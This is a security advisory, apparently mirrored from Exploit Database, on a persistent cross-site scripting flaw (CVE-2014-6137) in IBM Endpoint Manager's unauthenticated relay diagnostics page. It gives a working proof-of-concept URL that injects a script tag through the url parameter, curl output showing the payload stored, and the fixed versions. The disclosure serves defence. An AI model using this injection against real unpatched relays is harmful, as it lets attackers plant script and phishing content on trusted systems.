IBM Endpoint Manager – Persistent Cross-Site Scripting

• Exploit Database
• 17 阅读

• 作者： RedTeam Pentesting
  日期： 2015-02-11
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/36057/

• Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics
  Page
  
  During a penetration test, RedTeam Pentesting discovered that the IBM
  Endpoint Manager Relay Diagnostics page allows anybody to persistently
  store HTML and JavaScript code that is executed when the page is opened
  in a browser.
  
  
  Details
  =======
  
  Product: IBM Endpoint Manager
  Affected Versions:9.1.x versions earlier than 9.1.1229,
  9.2.x versions earlier than 9.2.1.48
  Fixed Versions: 9.1.1229, 9.2.1.48
  Vulnerability Type: Cross-Site Scripting
  Security Risk: medium
  Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
  Vendor Status: fixed version released
  Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
  Advisory Status: published
  CVE:CVE-2014-6137
  CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137
  
  
  Introduction
  ============
  
  IBM Endpoint Manager products - built on IBM BigFix technology - can
  help you achieve smarter, faster endpoint management and security. These
  products enable you to see and manage physical and virtual endpoints
  including servers, desktops, notebooks, smartphones, tablets and
  specialized equipment such as point-of-sale devices, ATMs and
  self-service kiosks. Now you can rapidly remediate, protect and report
  on endpoints in near real time.
  
  (from the vendor's homepage)
  
  
  More Details
  ============
  
  Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint
  Manager, or TEM) components, such as TEM Root Servers or TEM Relays,
  typically serve HTTP and HTTPS on port 52311. There, the server or relay
  diagnostics page is normally accessible at the path /rd. That page can
  be accessed without authentication and lets users query and modify
  different information. For example, a TEM Relay can be instructed to
  gather a specific version of a certain Fixlet site by requesting a URL
  such as the following:
  
  http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
  &version=1
  &useCRC=0
  
  The URL parameter url is susceptible to cross-site scripting. When the
  following URL is requested, the browser executes the JavaScript code
  provided in the parameter:
  
  http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0
  
  The value of that parameter is also stored in the TEM Relay's site list,
  so that the embedded JavaScript code is executed whenever the
  diagnostics page is opened in a browser:
  
  $ curl http://tem-relay.example.com:52311/rd
  [...]
  
  <select NAME="url">
  [...]
  <option>http://"><script>alert(/XSS/)</script></option>
  </select>
  
  
  Proof of Concept
  ================
  
  http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion&version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0
  
  
  Fix
  ===
  
  Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.
  
  
  Security Risk
  =============
  
  As the relay diagnostics page is typically not frequented by
  administrators and does not normally require authentication, it is
  unlikely that the vulnerability can be exploited to automatically and
  reliably attack administrative users and obtain their credentials.
  
  Nevertheless, the ability to host arbitrary HTML and JavaScript code on
  the relay diagnostics page, i.e. on a trusted system, may allow
  attackers to conduct very convincing phishing attacks.
  
  This vulnerability is therefore rated as a medium risk.
  
  
  Timeline
  ========
  
  2014-07-29 Vulnerability identified during a penetration test
  2014-08-06 Customer approves disclosure to vendor
  2014-09-03 Vendor notified
  2015-01-13 Vendor releases security bulletin and software upgrade
  2015-02-04 Customer approves public disclosure
  2015-02-10 Advisory released
  
  
  RedTeam Pentesting GmbH
  =======================
  
  RedTeam Pentesting offers individual penetration tests, short pentests,
  performed by a team of specialised IT-security experts. Hereby, security
  weaknesses in company networks or products are uncovered and can be
  fixed immediately.
  
  As there are only few experts in this field, RedTeam Pentesting wants to
  share its knowledge and enhance the public knowledge with research in
  security-related areas. The results are made available as public
  security advisories.
  
  More information about RedTeam Pentesting can be found at
  https://www.redteam-pentesting.de.
  
  
  -- 
  RedTeam Pentesting GmbH Tel.: +49 241 510081-0
  Dennewartstr. 25-27 Fax : +49 241 510081-99
  52068 Aachenhttps://www.redteam-pentesting.de
  Germany Registergericht: Aachen HRB 14004
  Geschäftsführer: Patrick Hof, Jens Liebchen